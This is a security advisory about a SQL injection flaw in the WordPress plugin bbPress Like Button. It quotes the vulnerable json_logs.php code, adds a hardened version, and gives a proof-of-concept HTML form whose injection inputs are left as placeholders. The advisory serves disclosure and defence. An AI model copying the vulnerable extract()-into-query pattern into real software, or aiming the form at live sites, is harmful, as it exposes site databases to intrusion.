03 Oct

SQL Injection Vulnerability in bbPress Like Button

One of the things we do to make sure we are providing our customers with the best data on the vulnerabilities that exist and are being exploited in WordPress plugins is to monitor our websites for hacking attempts. Through that we have found quite a few vulnerabilities that exist in the current versions of plugins and that hackers appear to have already started exploiting. In the most recent case, though, we are still not quite sure what the hacker was targeting. Recently we found a hacker probing for usage of the plugin bbPress Like Button, along with five other plugins at the same time. As we started looking over the plugins, one connection we found was that they all contained code that looked susceptible to SQL injection. That type of vulnerability is not one we often see targeted by hackers, so it is possible there is an additional issue with the plugin.

The vulnerable code can be found in the file /json_logs.php, where the extract() function is used to set variables from POST inputs, which are then used in a SQL query without any sanitization and without the query being parameterized:

extract($_POST); // every POST key becomes a local variable, so all of the values below are attacker-controlled

//Defaults
if(!isset($sortname) || $sortname == ''){
    $sortname = 'meta_id';
}
if(!isset($sortorder)){
    $sortorder = 'desc';
}
if(!isset($rp)){
    $rp = '1000';
}
if(!isset($page)){
    $page = 1;
}
$sortorder = strtoupper($sortorder);
$offset = ((Integer)$page - 1) * $rp; // $page is cast to an integer, $rp is not

//Get the data
global $wpdb;
$table_name = $wpdb->prefix.'postmeta';

// $sortname, $sortorder and $rp are interpolated straight into the query
$results = $wpdb->get_results("SELECT * FROM $table_name where meta_key = 'bbpl_like' ORDER BY $sortname $sortorder LIMIT $rp OFFSET $offset",ARRAY_A);
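For comparison, here is how the same query can be built without exposing it to injection. This is an added example written for this post; it is not the plugin's code or a patch from its author. The function name bbpl_get_like_logs_safe and the allow-list of postmeta columns are our own choices; $wpdb->prepare(), $wpdb->get_results(), $wpdb->prefix and ARRAY_A are the real WordPress APIs. The two points it shows are that the column name and sort direction cannot be bound as placeholders and so must be checked against a fixed list, while the numeric values can be cast and passed through prepare().

```php
<?php
// Added example, not the plugin's code: a hardened replacement for the
// query-building part of json_logs.php. The function name and the
// allow-list are assumptions made for this illustration.

/**
 * Build and run the like-log query without letting any request value
 * reach the SQL string unvalidated.
 *
 * @param array $request  Normally $_POST; passed in so the logic is testable.
 * @return array          Result rows as associative arrays.
 */
function bbpl_get_like_logs_safe( array $request ) {
    global $wpdb;

    // 1. Do not extract() request data into the local scope. Read each
    //    expected key explicitly; any other key is simply ignored.
    $sortname  = isset( $request['sortname'] )  ? (string) $request['sortname']  : 'meta_id';
    $sortorder = isset( $request['sortorder'] ) ? (string) $request['sortorder'] : 'desc';
    $rp        = isset( $request['rp'] )        ? (int) $request['rp']           : 1000;
    $page      = isset( $request['page'] )      ? (int) $request['page']         : 1;

    // 2. Identifiers (column name, sort direction) cannot be bound with
    //    placeholders, so they are matched against a fixed allow-list.
    //    These are the columns of the wp_postmeta table.
    $allowed_columns = array( 'meta_id', 'post_id', 'meta_key', 'meta_value' );
    if ( ! in_array( $sortname, $allowed_columns, true ) ) {
        $sortname = 'meta_id';
    }
    $sortorder = ( strtoupper( $sortorder ) === 'ASC' ) ? 'ASC' : 'DESC';

    // 3. Numeric values are clamped to a sane range and then bound with %d.
    $rp     = max( 1, min( $rp, 1000 ) );
    $page   = max( 1, $page );
    $offset = ( $page - 1 ) * $rp;

    $table_name = $wpdb->prefix . 'postmeta';

    // Table and column names come only from code and the allow-list above;
    // the user-controlled values travel through prepare().
    $sql = $wpdb->prepare(
        "SELECT * FROM {$table_name} WHERE meta_key = %s ORDER BY {$sortname} {$sortorder} LIMIT %d OFFSET %d",
        'bbpl_like',
        $rp,
        $offset
    );

    return $wpdb->get_results( $sql, ARRAY_A );
}
```

This closes the injection itself. Whether an unauthenticated request should be able to read the like log at all is a separate access-control question that the code shown on this page does not answer.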

Proof of Concept

The following proof of concept will permit SQL injection to occur.

Make sure to replace “[path to WordPress]” with the location of WordPress and the “[SQL injection input …]” with appropriate input.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/bbpress-like-button/json_logs.php" method="POST">
<input type="hidden" name="sortname" value="[SQL injection input after ORDER BY]" />
<input type="hidden" name="sortorder" value="[SQL injection input after ORDER BY]" />
<input type="hidden" name="rp" value="[SQL injection input after LIMIT]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 10/3/2016 – WordPress.org Plugin Directory notified.
